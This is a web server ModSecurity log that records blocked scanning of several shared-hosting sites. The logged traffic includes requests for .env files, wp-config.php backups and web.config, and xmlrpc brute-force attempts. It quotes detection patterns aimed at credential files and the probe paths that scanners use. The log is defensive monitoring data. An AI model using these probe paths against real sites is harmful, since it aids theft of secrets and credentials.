[Tue May 26 13:42:18.548393 2026] [security2:error] [pid 536875:tid 537076] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV4ur_-FTveSGlx1HzMgAAAMw"]
[Tue May 26 13:42:18.820230 2026] [security2:error] [pid 544395:tid 544649] [client 106.192.248.115:50659] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVV4hmrs7g3RMCdp8XVoAAAAHw"]
[Tue May 26 13:42:18.824810 2026] [security2:error] [pid 544395:tid 544649] [client 106.192.248.115:50659] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVV4hmrs7g3RMCdp8XVoAAAAHw"]
[Tue May 26 13:42:20.002427 2026] [security2:error] [pid 544395:tid 544561] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV4xmrs7g3RMCdp8XVrQAAACQ"]
[Tue May 26 13:42:21.930788 2026] [security2:error] [pid 544395:tid 544647] [client 64.233.173.232:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVV5Rmrs7g3RMCdp8XVywAAAHo"]
[Tue May 26 13:42:22.207220 2026] [security2:error] [pid 544395:tid 544510] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/.env.backup"] [unique_id "ahVV5hmrs7g3RMCdp8XV3gAAd3I"]
[Tue May 26 13:42:22.379889 2026] [security2:error] [pid 544395:tid 544556] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV5Rmrs7g3RMCdp8XV2wAAAB8"]
[Tue May 26 13:42:22.482162 2026] [security2:error] [pid 544395:tid 544537] [client 47.128.47.142:18298] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cicodev.org"] [uri "/robots.txt"] [unique_id "ahVV5hmrs7g3RMCdp8XV5gAAAAw"]
[Tue May 26 13:42:23.063527 2026] [security2:error] [pid 536875:tid 537018] [client 181.116.178.165:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV5ur_-FTveSGlx1HzYAAAAJI"]
[Tue May 26 13:42:23.319031 2026] [security2:error] [pid 544395:tid 544509] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/.env.old"] [unique_id "ahVV5xmrs7g3RMCdp8XV9AAAc3E"]
[Tue May 26 13:42:23.602918 2026] [security2:error] [pid 544395:tid 544516] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/.env.bak"] [unique_id "ahVV5xmrs7g3RMCdp8XV_gAATHg"]
[Tue May 26 13:42:23.967771 2026] [security2:error] [pid 544395:tid 544523] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/config/.env"] [unique_id "ahVV5xmrs7g3RMCdp8XWAgAAS38"]
[Tue May 26 13:42:24.350416 2026] [security2:error] [pid 544395:tid 544402] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/app/.env"] [unique_id "ahVV6Bmrs7g3RMCdp8XWAwAAYwY"]
[Tue May 26 13:42:24.402286 2026] [security2:error] [pid 536875:tid 537040] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV5-r_-FTveSGlx1HzbwAAAKg"]
[Tue May 26 13:42:24.849521 2026] [security2:error] [pid 544395:tid 544397] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/src/.env"] [unique_id "ahVV6Bmrs7g3RMCdp8XWFAAADgE"]
[Tue May 26 13:42:25.232315 2026] [security2:error] [pid 544395:tid 544608] [client 77.68.9.24:57232] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.9.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/images/images/cache.php"] [unique_id "ahVV6Rmrs7g3RMCdp8XWGAAAAFM"], referer: www.google.com
[Tue May 26 13:42:25.267433 2026] [security2:error] [pid 544395:tid 544411] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/backend/.env"] [unique_id "ahVV6Rmrs7g3RMCdp8XWGQAAJQ8"]
[Tue May 26 13:42:26.525417 2026] [security2:error] [pid 544395:tid 544642] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV6hmrs7g3RMCdp8XWLwAAAHU"]
[Tue May 26 13:42:26.576479 2026] [security2:error] [pid 544395:tid 544399] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/api/.env"] [unique_id "ahVV6hmrs7g3RMCdp8XWPQAAEQM"]
[Tue May 26 13:42:27.249397 2026] [security2:error] [pid 544395:tid 544522] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "divinternationalcourier.in"] [uri "/config.php"] [unique_id "ahVV6xmrs7g3RMCdp8XWUAAAVX4"]
[Tue May 26 13:42:27.455684 2026] [security2:error] [pid 544395:tid 544590] [client 198.177.125.186:53902] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "208.91.198.85"] [uri "/"] [unique_id "ahVV6xmrs7g3RMCdp8XWUQAAAEE"]
[Tue May 26 13:42:27.678228 2026] [security2:error] [pid 544395:tid 544570] [client 198.177.125.186:60156] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "208.91.198.85"] [uri "/"] [unique_id "ahVV6xmrs7g3RMCdp8XWXAAAAC0"]
[Tue May 26 13:42:27.757305 2026] [security2:error] [pid 544395:tid 544543] [client 129.222.147.134:21936] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVV6xmrs7g3RMCdp8XWWAAAABI"]
[Tue May 26 13:42:27.757463 2026] [security2:error] [pid 544395:tid 544543] [client 129.222.147.134:21936] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVV6xmrs7g3RMCdp8XWWAAAABI"]
[Tue May 26 13:42:28.118470 2026] [security2:error] [pid 536875:tid 537079] [client 43.134.94.213:22924] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ivwellnessresources.org"] [uri "/"] [unique_id "ahVV7Or_-FTveSGlx1HzhgAAAM8"]
[Tue May 26 13:42:28.118573 2026] [security2:error] [pid 536875:tid 537079] [client 43.134.94.213:22924] ModSecurity: Warning. Matched phrase "Sogou web spider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ivwellnessresources.org"] [uri "/"] [unique_id "ahVV7Or_-FTveSGlx1HzhgAAAM8"]
[Tue May 26 13:42:28.128227 2026] [security2:error] [pid 544395:tid 544563] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV6xmrs7g3RMCdp8XWXwAAACY"]
[Tue May 26 13:42:28.264931 2026] [security2:error] [pid 544395:tid 544519] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "divinternationalcourier.in"] [uri "/settings.php"] [unique_id "ahVV7Bmrs7g3RMCdp8XWZgAAOXs"]
[Tue May 26 13:42:28.986163 2026] [security2:error] [pid 544395:tid 544520] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "divinternationalcourier.in"] [uri "/wp-config.php"] [unique_id "ahVV7Bmrs7g3RMCdp8XWbgAAUHw"]
[Tue May 26 13:42:29.296232 2026] [security2:error] [pid 544395:tid 544627] [client 106.192.248.115:50971] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVV7Rmrs7g3RMCdp8XWdAAAAGY"]
[Tue May 26 13:42:29.296360 2026] [security2:error] [pid 544395:tid 544627] [client 106.192.248.115:50971] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVV7Rmrs7g3RMCdp8XWdAAAAGY"]
[Tue May 26 13:42:29.797275 2026] [security2:error] [pid 544395:tid 544578] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV7Rmrs7g3RMCdp8XWeQAAADU"]
[Tue May 26 13:42:29.803282 2026] [security2:error] [pid 544395:tid 544637] [client 77.68.9.24:51135] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.9.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/images/images/cache.php"] [unique_id "ahVV7Rmrs7g3RMCdp8XWgAAAAHA"], referer: www.google.com
[Tue May 26 13:42:30.385710 2026] [security2:error] [pid 544395:tid 544398] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "divinternationalcourier.in"] [uri "/config.php.bak"] [unique_id "ahVV7hmrs7g3RMCdp8XWkQAAEgI"]
[Tue May 26 13:42:31.386258 2026] [security2:error] [pid 544395:tid 544408] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "divinternationalcourier.in"] [uri "/wp-config.php.backup"] [unique_id "ahVV7xmrs7g3RMCdp8XWpAAAEAw"]
[Tue May 26 13:42:31.709595 2026] [security2:error] [pid 536875:tid 537111] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV7-r_-FTveSGlx1HzowAAAO8"]
[Tue May 26 13:42:32.430823 2026] [security2:error] [pid 544395:tid 544413] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "divinternationalcourier.in"] [uri "/wp-config.php.bak"] [unique_id "ahVV8Bmrs7g3RMCdp8XWuAAAVxE"]
[Tue May 26 13:42:32.679931 2026] [security2:error] [pid 544395:tid 544406] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "divinternationalcourier.in"] [uri "/wp-config.php.old"] [unique_id "ahVV8Bmrs7g3RMCdp8XWvAAAAgo"]
[Tue May 26 13:42:32.943616 2026] [security2:error] [pid 544395:tid 544414] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "divinternationalcourier.in"] [uri "/wp-config.php.save"] [unique_id "ahVV8Bmrs7g3RMCdp8XWvwAAZxI"]
[Tue May 26 13:42:33.205088 2026] [security2:error] [pid 544395:tid 544425] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "divinternationalcourier.in"] [uri "/wp-config.php.swp"] [unique_id "ahVV8Rmrs7g3RMCdp8XWwwAATB0"]
[Tue May 26 13:42:33.479808 2026] [security2:error] [pid 544395:tid 544428] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "divinternationalcourier.in"] [uri "/wp-config.php.txt"] [unique_id "ahVV8Rmrs7g3RMCdp8XWxgAANyA"]
[Tue May 26 13:42:34.093134 2026] [security2:error] [pid 544395:tid 544584] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV8Rmrs7g3RMCdp8XWzQAAADs"]
[Tue May 26 13:42:34.355013 2026] [security2:error] [pid 536875:tid 537077] [client 72.255.19.150:29167] ModSecurity: Warning. Match of "ipMatch 127.0.0.1,::1" against "REMOTE_ADDR" required. [file "/etc/httpd/modsecurity.d/00_asl_zz_strict.conf"] [line "82"] [id "331030"] [rev "2"] [msg "Atomicorp.com WAF Rules: Suspicious activity detected - HTTP Request Missing a Host Header"] [severity "NOTICE"] [tag "no_ar"] [hostname "md-74.webhostbox.net"] [uri "/boaform/admin/formLogin"] [unique_id "ahVV8ur_-FTveSGlx1HzxAAAAM0"]
[Tue May 26 13:42:34.483669 2026] [security2:error] [pid 536875:tid 537077] [client 72.255.19.150:29167] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahVV8ur_-FTveSGlx1HzxAAAAM0"]
[Tue May 26 13:42:35.429799 2026] [security2:error] [pid 544395:tid 544583] [client 3.237.65.43:52122] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 43.65.237.3.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "avprealty.com"] [uri "/images/images/cache.php"] [unique_id "ahVV8xmrs7g3RMCdp8XW5wAAADo"], referer: www.google.com
[Tue May 26 13:42:35.759698 2026] [security2:error] [pid 544395:tid 544448] [remote 23.79.233.44:44985] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "panda-eco.com"] [uri "/"] [unique_id "ahVV8xmrs7g3RMCdp8XW8gAAQjQ"]
[Tue May 26 13:42:35.880944 2026] [security2:error] [pid 544395:tid 544566] [client 85.208.96.208:11346] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/nerf/day/2026-04-23/"] [unique_id "ahVV8xmrs7g3RMCdp8XW9wAAACk"]
[Tue May 26 13:42:35.881103 2026] [security2:error] [pid 544395:tid 544566] [client 85.208.96.208:11346] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/nerf/day/2026-04-23/"] [unique_id "ahVV8xmrs7g3RMCdp8XW9wAAACk"]
[Tue May 26 13:42:35.971429 2026] [security2:error] [pid 544395:tid 544560] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV8xmrs7g3RMCdp8XW7QAAACM"]
[Tue May 26 13:42:37.955111 2026] [security2:error] [pid 544395:tid 544544] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV9Rmrs7g3RMCdp8XXGAAAABM"]
[Tue May 26 13:42:37.986288 2026] [security2:error] [pid 544395:tid 544629] [client 129.222.147.134:40929] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVV9Rmrs7g3RMCdp8XXJwAAAGg"]
[Tue May 26 13:42:37.988189 2026] [security2:error] [pid 544395:tid 544629] [client 129.222.147.134:40929] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVV9Rmrs7g3RMCdp8XXJwAAAGg"]
[Tue May 26 13:42:39.793829 2026] [security2:error] [pid 544395:tid 544420] [remote 216.185.214.209:51258] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.214.185.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVV9xmrs7g3RMCdp8XXRgAAKxg"]
[Tue May 26 13:42:39.852021 2026] [security2:error] [pid 536875:tid 537074] [client 106.192.248.115:51271] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVV9-r_-FTveSGlx1H0CgAAAMo"]
[Tue May 26 13:42:39.852158 2026] [security2:error] [pid 536875:tid 537074] [client 106.192.248.115:51271] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVV9-r_-FTveSGlx1H0CgAAAMo"]
[Tue May 26 13:42:40.150713 2026] [security2:error] [pid 544395:tid 544643] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV9xmrs7g3RMCdp8XXTwAAAHY"]
[Tue May 26 13:42:40.291944 2026] [security2:error] [pid 544395:tid 544418] [remote 45.148.10.5:60782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "divinternationalcourier.in"] [uri "/web.config"] [unique_id "ahVV-Bmrs7g3RMCdp8XXVQAAUxY"]
[Tue May 26 13:42:41.704233 2026] [security2:error] [pid 536875:tid 537057] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVV-er_-FTveSGlx1H0FQAAALk"]
